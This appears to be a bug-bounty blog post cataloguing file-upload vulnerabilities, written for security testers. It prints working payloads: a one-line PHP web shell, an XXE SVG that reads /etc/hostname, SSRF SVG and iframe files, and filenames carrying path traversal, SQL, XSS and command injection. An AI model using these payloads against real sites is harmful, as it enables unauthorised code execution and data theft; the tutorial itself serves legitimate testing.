Hunting for Bugs in File Upload Feature:

Sm4rty
6 min readDec 28, 2021

--

Hey there, I am Samrat Gupta aka Sm4rty, a Security Researcher and a Bug Bounty Hunter. In this blog, I will be listing down some file upload vulnerabilities.

Introduction:

In most of the application you find file upload feature. This functionality, however, is implemented in many different forms based on the application’s use case. While some applications only allow uploading a profile picture and support only image-related extensions, on the other hand, some applications support other extensions based on their business case.

1. RCE via File Upload:

One of the most interesting attacks that come into mind whenever there is a file upload functionality is Remote Code Execution. There are several ways to execute a code execution with malicious files, one of the most common is to upload a shell and gain further access.

PHP shell for RCE:
Try Uploading this code with .php extension and Try to locate and retrieve the php file from application. In the file url you can add ‘c’ parameter where you can enter commands like ‘whoami’. For example, “https://example.com/shell.php?cmd=whoami

<?php phpinfo();?>
<?php system($_GET[‘c’]);?>

Its will not be this simple in real world application, there will be some restrictions on uploading these php files, We will talk about the file upload bypass techniques below.

Further Reads:
https://hackerone.com/reports/506646
https://hackerone.com/reports/343726
https://sidblog.medium.com/file-upload-to-rce-7c04b3b252de
https://chris-young.net/2020/04/14/file-upload-to-remote-code-execution/

[Bonus] RCE via .gif upload:
https://hackerone.com/reports/135072

2. XSS via File Upload:

While performing testing on file upload functionality, there are multiple ways to execute a cross-site scripting attack scenario. A file upload is a serious opportunity to find cross-site scripting (XSS) to a web application. Below are few ways to achieve XSS via File Upload-
1. XSS via Filename
2. XSS via Metadata
3. XSS via SVG file
4. Blind XSS via SVG

Reproduction Steps along with details of all the above methods can be found at one place in this awesome blog by Brutelogic. Check out the script to get Blind XSS via SVG file here:

Further Reads:
https://brutelogic.com.br/blog/file-upload-xss/
https://hackerone.com/reports/964550
https://hackerone.com/reports/880099
https://hackerone.com/reports/1010466

3. SSRF via File Upload:

Server-Side Request Forgery is one of the very interesting and impactful security vulnerability. A file upload functionality that may allow the use of files such as HTML or SVG files. It may an Internal SSRF, Cloud Metadata SSRF or simply an External SSRF.

1. SSRF via Filename.
Try to send URL as filename to get blind SSRF, for example filename=https://172.17.0.1/internal/file. You can also try to change type=”file” to type=”url” within a request.

2. SSRF via SVG Upload:
Try Uploading this code with .svg extension and retrive the svg file from application to check:

<svg width="200" height="200"
xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<image xlink:href="https://example.com/image.jpg" height="200" width="200"/>
</svg>

3. SSRF via Iframe in Html:
Try Uploading this code with .html extension and retrive the html file from application to check:

<html>
<body>
<iframe src=”
http://collaborator.net" width=”500" height=”500"></iframe>
</body>
</html>

Further Reads:
https://hackerone.com/reports/223203
https://hackerone.com/reports/223203
https://github.com/allanlw/svg-cheatsheet
https://shahjerry33.medium.com/server-side-request-forgery-a-forged-document-6359ef25058d

4. XXE via File Upload:

The file upload functionality, opens the gateway for the XML External Entities, especially when the application accepts the file formats that support XML. Since the SVG format uses XML, an attacker can submit a malicious SVG image and so reach hidden attack surface for XXE vulnerabilities.

Try Uploading this code with .svg extension and retrieve the svg file from application to check:

<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<text font-size="16" x="0" y="16">&xxe;</text></svg>

Further Reads:
https://hackerone.com/reports/897244
https://www.exploit-db.com/docs/49732
https://portswigger.net/web-security/xxe/lab-xxe-via-file-upload

5. CSRF on File Upload:

Cross-Site Request Forgery (CSRF) is an attack that forces authenticated users to submit a request to a Web application against which they are currently authenticated.It is possible to perform CSRF attacks on file upload functionality by creating HTML Form.

Steps of Reproduction:
1. Capture the Upload form Request.
2. Create POC with Burp CSRF POC generator.
3. Open that POC html file in different account in different browser
4. And see if File upload is successful in another account.

Further Reads:
https://hackerone.com/reports/868572
https://hackerone.com/reports/169699
http://aetherlab.net/2013/04/here-it-is-the-file-upload-csrf/

6. Exif MetaData Leakage:

It occurs when a user uploads an image in example.com, the uploaded image’s EXIF Metadata Data does not gets stripped. As a result, anyone can get sensitive information of example.com users like their Geo-location, their Device information like Device Name, Version, Software & Software version used etc.

Steps for Reproduction:

1) Visit this Repo. There are lot of images with metadata.
2) Upload the image to website.
3) Download the uploaded Image from website.
4) Visit this link to check whether exif metadata is not stripped or not. If not then you can report it.

Further Reads:
https://hackerone.com/reports/446238
https://hackerone.com/reports/906907
https://kathan19.gitbook.io/howtohunt/exif-geo-data-not-stripped/exif_geo

7. OpenRedirect via SVG File Upload:

Open Redirect with the File Upload functionality is not widely seen or talked about but still possible to execute under specific conditions. It is possible to create a payload that results in redirecting users to an attacker-controlled domain, an open redirection scenario can be crafted.

Steps of Reproduction:

  1. Save the below code as .svg file.
<svg width="200" height="200"
xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<image xlink:href="https://example.com/image.jpg" height="200" width="200"/>
</svg>

2. Upload the file, Try to retrive a file.

Further Reads:
https://hackerone.com/reports/368927
https://www.wizlynxgroup.com/security-research-advisories/vuln/WLX-2020-009

8. Large File DOS:

Often there is a size restriction associated with the File Upload functionality that may range from 5 MB to 200 MB or even smaller/larger depending upon the application logic. However if validation checks are not present, it may allow an attacker to upload a file with a relatively large size resulting in resource consumption that may lead to a Denial of Service situation.

To check for this issue, one can follow below simple steps:

  1. Create a file that is larger in the size than defined upper limit. For example, an image file having a 500 MB file size.
  2. Now, upload the file, and if the application accepts the file and starts processing it, browser the application from another device to see if there’s any sluggish behavior or connectivity error.

Further Reads:
https://hackerone.com/reports/887321
https://hackerone.com/reports/454

9. File Upload Bypass:

It is when the server validates the file that is uploaded by comparing its extension, this validation are used to stop the attacker from uploading various malicious file. There are a list of bypasses available which we can use to bypass this security filters.

Here are few amazing Resources where all those file Upload bypasses can be easily found:

  1. PayloadAllTheThings File Upload Bypass.
  2. Unrestricted File Upload~Owasp
  3. Hacktricks ~ File Upload Methodology

10. File Name Vulnerability:

Here are a few Vulnerability which can be achieved in file upload vulnerability by changing file name. Its easy to test and worth having in your checklist. You can change the file name to following name to achieve respective bugs.

  1. Path Traversals: ../../../tmp/lol.png
  2. SQL Injection: sleep(10) — -.jpg
  3. XSS: <svg onload=alert(document.comain)>.jpg/png
  4. Command Injection: ; sleep 10;.jpg
  5. DOS: Rename your file to a long string and upload, It may cause DOS.

Thanks for Reading. Any Suggestions are always welcomed!!

If you haven’t Subscribed yet, Please Do Subscribe. You can Buy me a coffee and Follow me on Twitter.

--

--

Sm4rty
Sm4rty

Written by Sm4rty

Smart contract Auditor and Web3 Security Researcher. Interested in Web3 and SmartContract Security.